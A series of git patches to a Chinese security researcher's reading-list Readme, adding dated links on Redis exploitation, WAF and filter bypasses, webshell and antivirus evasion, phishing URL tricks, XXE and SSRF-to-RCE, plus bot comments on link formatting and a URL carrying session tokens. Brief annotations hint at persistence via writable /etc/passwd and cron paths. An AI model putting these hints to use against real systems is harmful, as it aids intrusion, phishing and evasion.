file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 20d2377..cd55399 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -265,3 +265,4 @@ + 2023/02/01 [Nginx 通过 Lua + Redis 实现动态封禁 IP](https://mp.weixin.qq.com/s/jjwTz53ks61cN5O3l8jHdw) + 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) ++ 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** From 01f655987e69a8c767deb43102ad63c3cca9e5bf Mon Sep 17 00:00:00 2001 
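Review bot: In [PATCH 195/257] the new 2023/02/02 entry 水平越权挖掘技巧与自动化越权漏洞检测 links to `https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8`, which is this repository's own java日常 directory rather than an article, so the reference is lost; replace it with the source URL. The Redis line edited in the same hunk still will not render as bold: with a space after the opening `**` the marker cannot open emphasis, and the `*` globs in `/var/spool/cron/*` and `/etc/cron.d/*` sit inside the span. Putting the paths in backticks and dropping the padding spaces inside the bold markers would fix it.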
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Feb 2023 18:20:00 +0800 Subject: [PATCH 197/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cd55399..1274f69 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -266,3 +266,4 @@ + 2023/02/01 [Redis常见利用方法](https://mp.weixin.qq.com/s/qQkiGO5wPs8no_BoK13tig) ** 可写/etc/passwd 替换,计划任务 centos可写/var/spool/cron/* ubuntu 写/etc/cron.d/* ** + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** ++ 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** From d66d38939f448a4f316f06cea4756d3455bdc018 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Feb 2023 21:31:54 +0800 Subject: [PATCH 198/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1274f69..bc75483 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -267,3 +267,4 @@ + 2023/02/02 [水平越权挖掘技巧与自动化越权漏洞检测](https://github.com/Firebasky/Java/tree/main/java%E6%97%A5%E5%B8%B8) + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** ++ 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** From 62a7791c550314a2750df8d2f7e61dc7df9d4b61 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 10 Feb 2023 13:06:15 +0800 Subject: [PATCH 199/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bc75483..15f4423 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -268,3 +268,4 @@ + 2023/02/03 [ImageMagick:隐藏在网上图像背后的漏洞](https://mp.weixin.qq.com/s/zJkZbNmA1vDkpxP0SNVxHA) **np** + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** ++ 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** From fb4d535ca76fe7bf49c67b050c659a5b376ad454 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 10 Feb 2023 21:01:02 +0800 Subject: [PATCH 200/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 15f4423..ea9768f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -269,3 +269,4 @@ + 2023/02/06 [Numen安全研究员发现Apache Linkis漏洞CVE-2022-44645](https://mp.weixin.qq.com/s/rrC_CkSvEOsb8Xib21co0A) **黑名单可以bypass** + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** + 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** ++ 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) From 12a737174f71891b9358c0d1d9be4bd120cf2aeb Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Feb 2023 17:47:26 +0800 Subject: [PATCH 201/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ea9768f..0133fcb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -270,3 +270,4 @@ + 2023/02/08 [实战钓鱼之url魔改](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247490656&idx=1&sn=0d98bc095f34ecfb53f0c0d5d835ba32&chksm=c187dc71f6f0556707214ade4ebd207f2a6aeba469f5641f15d96892c13a37a8856c67421f1c&mpshare=1&scene=23&srcid=0208XWF2fNX9S3weD9OrMXKT&sharer_sharetime=1675853346072&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **有点意思,可以用在钓鱼方面** + 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) ++ 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) From 02f2c95f5bc469d6fccb1a0414cd3a41b9e547c1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Feb 2023 13:05:11 +0800 Subject: [PATCH 202/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 0133fcb..b3be6a3 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -271,3 +271,4 @@ + 2023/02/10 [json 格式 bypass waf](https://lab.wallarm.com/waf-json-decoding-capability-required-to-protect-against-api-threats-like-cve-2020-13942-apache-unomi-rce/) **json 默认支持 unicode 编码** + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) ++ 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** From ac094e42846e39b6174bb1bfc673d45d2f0d322d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Feb 2023 15:56:44 +0800 Subject: [PATCH 203/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b3be6a3..70028f4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -272,3 +272,4 @@ + 2023/02/10 [红队攻防实践:unicode进行webshell免杀的思考](https://mp.weixin.qq.com/s?__biz=MzI4MzA0ODUwNw==&mid=2247484997&idx=1&sn=8694814291d80337928e59afd3034b4c&chksm=eb91e911dce6600735f1d4fae65fb01c682fe9bddc3e72a67d2ae993baac5ccc1f93c1924467&cur_album_id=1342350211271966722&scene=189#wechat_redirect) **里面的零宽连接符ZWJ有意思** [零宽字符妙用](https://1991421.cn/2021/03/08/3c5b1b78/) + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** ++ 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** From b503047ef4c3079a5a705a93c01eb2c8e5e4f15d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 16 Feb 2023 00:11:53 +0800 Subject: [PATCH 204/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 70028f4..d955a35 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -273,3 +273,4 @@ + 2023/02/11 [PWN2OWNING TWO HOSTS AT THE SAME TIME: ABUSING INDUCTIVE AUTOMATION IGNITION’S CUSTOM DESERIALIZATION](https://www.zerodayinitiative.com/blog/2023/2/6/pwn2owning-two-hosts-at-the-same-time-abusing-inductive-automation-ignitions-custom-deserialization) + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** ++ 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** From cc284e79c6d34b2f343a438c11c99854c2d0f43f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 18 Feb 2023 22:31:23 +0800 Subject: [PATCH 205/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d955a35..4932f67 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -274,3 +274,4 @@ + 2023/02/14 [环境变量的利用](https://www.elttam.com/blog/env/#content) **np的** + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** ++ 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** From 4e0ce4ecefb4d473bf9604f203e102eb9fc9c419 Mon Sep 17 00:00:00 2001 
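Review bot: In [PATCH 205/257] the added 2023/02/18 entry has the Markdown link parts swapped: the URL `https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A` is inside the square brackets and the title 顶级Javaer都在使用的类库,真香! is inside the parentheses, so the rendered link shows the raw URL as its text and uses the title as its target. Every other entry in this list is `[title](url)`; suggest `[顶级Javaer都在使用的类库,真香!](https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A)`.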
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Feb 2023 21:12:18 +0800 Subject: [PATCH 206/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4932f67..ba1ceb2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -275,3 +275,4 @@ + 2023/02/14 [GHSL-2021-1009: URL access filters bypass in Alpine - CVE-2022-23553](https://securitylab.github.com/advisories/GHSL-2021-1009-Alpine/) **很多这样的bypass权限的利用** + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** ++ 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** From f3396a31db8d7b0fde4404991fd9a08f2f105937 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Feb 2023 23:54:43 +0800 Subject: [PATCH 207/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ba1ceb2..b5df6e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -276,3 +276,4 @@ + 2023/02/16 [XXE with Auto-Update in install4j](https://frycos.github.io/vulns4free/2023/02/12/install4j-xxe.html) **这个思路非常好,很多产品自动更新的时候去server端解析传递过来的xml格式就可能造成xxe。我们只需要evil server就可以完成攻击** + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** ++ 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** From e13aa0d4fe761514ead4608b66d4afd3a03a6ea4 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 13:48:16 +0800 Subject: [PATCH 208/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b5df6e9..51cc13e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -277,3 +277,4 @@ + 2023/02/18 [https://mp.weixin.qq.com/s/ff6LsT2j1OY1lv-_9gJN2A](顶级Javaer都在使用的类库,真香!) **可以记录一下** + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** ++ 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** From 71c867e35aee0a2fc12925d5e0586b1e0d74e3df Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 14:03:49 +0800 Subject: [PATCH 209/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 51cc13e..e99a5ff 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -278,3 +278,4 @@ + 2023/02/19 [Java代码审计项目--某在线教育开源系统](https://mp.weixin.qq.com/s/4sZWD792zxLIkIXPk01yhA) **这个流程是比较好的,看一些过滤器和监听器** + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** ++ 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** From d29418b5c34566a622647549ba52971f1ad1bad6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 20 Feb 2023 23:16:45 +0800 Subject: [PATCH 210/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e99a5ff..190a594 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
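Review bot: In [PATCH 209/257] the added 2023/02/20 link for 一次“SSRF-->RCE”的艰难利用 was pasted with the full client query string, including `sessionid=`, `key=`, `uin=`, `exportkey=` and `pass_ticket=`. These look like values from the sharer's own WeChat session rather than part of the article address, and committing them keeps them in the repository history. Other mp.weixin.qq.com entries in this file use the short `/s/<id>` form; suggest trimming this URL to `__biz`, `mid`, `idx` and `sn`.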
@@ -279,3 +279,4 @@ + 2023/02/19 [关于使用OCR文字识别方式进行免杀](https://xz.aliyun.com/t/12114) **好思路啊** + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** ++ 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) From 1f02625eb06ca1416d472985025e19a948f56ea9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 23 Feb 2023 14:26:43 +0800 Subject: [PATCH 211/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 190a594..d0965a9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -280,3 +280,4 @@ + 2023/02/20 [redis安全学习小记](https://mp.weixin.qq.com/s/W9joCtUQfNA62ZWXwqMmsw) **redis安全学习** + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) ++ 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) From 68e880256f1f0caa55e67c1c47f9cc1bd274001f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Feb 2023 18:24:28 +0800 Subject: [PATCH 212/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d0965a9..ecda1e9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -281,3 +281,4 @@ + 2023/02/20 [一次“SSRF-->RCE”的艰难利用](https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247483865&idx=1&sn=41e56040229e383a82a671fc359ee82b&chksm=f9ee6d66ce99e470d102becfcf63955f2aae1d88bc43ef8e7939bc93d786ff2f994eac969d32&scene=21&sessionid=1586255695&key=c00e1a5b49adb240be940797e7d3cb821bae9b89771be268faa858b2888bbba3e96562ccac53df81389cb41e548a9e6412d4f83b6b7b541825630aa6ace9d1d040a3b7cd677b5ca137cc9b1d2297948e&ascene=1&uin=MzE0MDM4MzExMw==&devicetype=Windows%2010&version=62080079&lang=zh_CN&exportkey=A6a52QI1M4H5IGXp8ekqTtY=&pass_ticket=awXcPg/ApqlfbrG8njT11ZZYAGjwbhrnExtbvARh//rtbsupQLnZBKBPE6SCXvhn#wechat_redirect) **学习** + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) ++ 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) From d3faec268f216b3d67813d249a772e8f2d059165 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 22:11:15 +0800 Subject: [PATCH 213/257] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ecda1e9..d007b10 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -282,3 +282,4 @@ + 2023/02/20 [五一快乐-微某OA从0day流量分析到武器化利用](https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw) + 2023/02/23 [实战 | 记一次针对非法网站的SSRF渗透](https://mp.weixin.qq.com/s/yfWAu6ebXA14GfOTP86XsA) + 2023/02/24 [【剖析 | SOFARPC 框架】之 SOFARPC 序列化比较](https://www.sofastack.tech/blog/sofa-rpc-serialization-comparison/) ++ 2023/03/02 [绕过Struts2 waf写入冰蝎马](https://mp.weixin.qq.com/s?__biz=MzkzNzE4MTk4Nw==&mid=2247485835&idx=1&sn=d09939cc178f8e7aaa085bbbef622557&chksm=c2921fc7f5e596d1312a37b816345a78d4343d509432725a0a558745304c579b9044ef870267&mpshare=1&scene=23&srcid=02286Y2A5JswXVZdDgoD4BXN&sharer_sharetime=1677591306084&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 8f5b383daf528198c5a5a3af50847a27ac338569 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 2 Mar 2023 22:26:27 +0800 Subject: [PATCH 214/257] Update Readme.md --- 